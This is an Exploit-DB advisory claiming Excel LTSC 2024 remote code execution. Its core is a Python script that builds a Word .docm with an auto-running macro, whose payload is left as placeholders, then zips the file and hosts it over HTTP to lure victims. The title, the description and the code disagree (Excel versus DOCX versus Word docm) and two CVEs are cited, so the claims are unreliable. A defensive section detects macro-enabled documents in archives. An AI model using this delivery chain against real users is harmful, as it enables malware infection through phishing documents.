Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)

EDB-ID: 52337

Platform: Windows

Date: 2025-06-20


# Titles: Microsoft Excel LTSC 2024 - Remote Code Execution (RCE)
# Author: nu11secur1ty
# Date: 06/16/2025
# Vendor: Microsoft
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751
# CVE-2025-47957
# Versions: Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise

## Description:
The attacker can trick any user into opening a malicious DOCX file, sent
via email or hosted on a streaming server, and so into executing the
attacker's code. After execution, the victim's machine can be infected or
even worse; this could be the end of their Windows machine! WARNING:
AMPUTATE THE MACROS OPTIONS FROM YOUR OFFICE 365!!!

STATUS: HIGH-CRITICAL Vulnerability


[+]Exploit:

```
#!/usr/bin/python
# CVE-2025-47957 by nu11secur1ty
import os
import time
import zipfile
import threading
import http.server
import socket
import socketserver
import win32com.client

def get_local_ip():
    """Get the LAN IP address of the current machine."""
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("8.8.8.8", 80))  # External DNS, just for routing
        ip = s.getsockname()[0]
        s.close()
        return ip
    except OSError:
        return "127.0.0.1"

def create_docm_with_auto_macro(filename):
    script_dir = os.path.dirname(os.path.abspath(__file__))
    full_path = os.path.join(script_dir, filename)

    word = win32com.client.Dispatch("Word.Application")
    word.Visible = False
    doc = word.Documents.Add()

    doc.Content.Text = "This document contains an auto-starting macro."

    vbproject = doc.VBProject
    vbcomponent = vbproject.VBComponents.Add(1)  # Standard Module

    macro_code = '''
Sub AutoOpen()
    Call YOUR_PoC
End Sub

Sub YOUR_PoC()
    Dim Program As String
    Dim TaskID As Double
    On Error Resume Next
    Program = "YOUR_EXPLOIT_HERE"
    TaskID = YOUR_TASK_HERE
    If Err <> 0 Then
        MsgBox "Can't start " & Program
    End If
End Sub
'''
    vbcomponent.CodeModule.AddFromString(macro_code)

    wdFormatXMLDocumentMacroEnabled = 13
    doc.SaveAs(full_path, FileFormat=wdFormatXMLDocumentMacroEnabled)
    doc.Close()
    word.Quit()

    print(f"[+] Macro-enabled .docm saved at: {full_path}")
    return full_path

def compress_to_zip(filepath):
    zip_path = filepath + '.zip'
    with zipfile.ZipFile(zip_path, 'w') as zipf:
        zipf.write(filepath, arcname=os.path.basename(filepath))
    print(f"[+] Compressed to ZIP: {zip_path}")
    return zip_path

def start_http_server(directory, port=8000):
    os.chdir(directory)
    handler = http.server.SimpleHTTPRequestHandler
    httpd = socketserver.TCPServer(("", port), handler)
    ip = get_local_ip()
    print(f"[+] HTTP server running at: http://{ip}:{port}/")

    thread = threading.Thread(target=httpd.serve_forever)
    thread.daemon = True
    thread.start()
    return httpd

if __name__ == "__main__":
    filename = "CVE-2025-47957.docm"
    docm_path = create_docm_with_auto_macro(filename)
    zip_path = compress_to_zip(docm_path)
    server = start_http_server(os.path.dirname(docm_path))

    try:
        print("[*] Server running — press Ctrl+C to stop...")
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[!] Ctrl+C detected — shutting down server...")
        server.shutdown()
        print("[+] The Exploit Server stopped. Goodbye!")

```
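
For defenders, the delivery chain in the script above (a macro-enabled `.docm` wrapped in a ZIP) can be flagged at a mail or web gateway by inspecting the container itself. The following is an added example, not part of the original advisory; the function names, limits and sample files are constructed for illustration.

```python
import io
import zipfile

MAX_DEPTH = 3                  # bound recursion into nested archives
MAX_MEMBER = 50 * 1024 * 1024  # skip oversized members (zip-bomb guard)

def find_macro_documents(data, name="<input>", depth=0):
    """Return paths of OOXML packages inside `data` that carry a VBA project."""
    if depth > MAX_DEPTH or not zipfile.is_zipfile(io.BytesIO(data)):
        return []
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if "[Content_Types].xml" in names:  # this ZIP is itself an OOXML package
            ctypes = zf.read("[Content_Types].xml").decode("utf-8", "replace").lower()
            has_vba = any(n.lower().endswith("vbaproject.bin") for n in names)
            # Macro-enabled main parts declare a "...macroEnabled.main+xml" type.
            return [name] if has_vba or "macroenabled" in ctypes else []
        for info in zf.infolist():  # plain archive: inspect each member
            if info.is_dir() or info.file_size > MAX_MEMBER:
                continue
            try:
                inner = zf.read(info)
            except (RuntimeError, zipfile.BadZipFile):  # encrypted or corrupt member
                continue
            hits += find_macro_documents(inner, f"{name}!{info.filename}", depth + 1)
    return hits

def build_zip(members):  # helper for the constructed samples below
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member_name, content in members.items():
            zf.writestr(member_name, content)
    return buf.getvalue()

# Constructed samples: a plain .docx, a .docm, and a ZIP wrapping both.
CT = ('<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
      '<Override PartName="/word/document.xml" ContentType="{}"/></Types>')
DOCX = build_zip({
    "[Content_Types].xml": CT.format(
        "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"),
    "word/document.xml": "<w:document/>"})
DOCM = build_zip({
    "[Content_Types].xml": CT.format("application/vnd.ms-word.document.macroEnabled.main+xml"),
    "word/document.xml": "<w:document/>",
    "word/vbaProject.bin": b"constructed placeholder, not a real VBA project"})
DELIVERY = build_zip({"sample.docm": DOCM, "notes.docx": DOCX})
if __name__ == "__main__":
    print(find_macro_documents(DELIVERY, "delivery.zip"))
```

A hit means the package carries a VBA project, not that the macro is malicious; treat it as a triage signal for quarantine or deeper macro analysis.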

# Reproduce:
[href](https://www.youtube.com/watch?v=r4NsGrO56yo)

# Time spent:
01:37:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
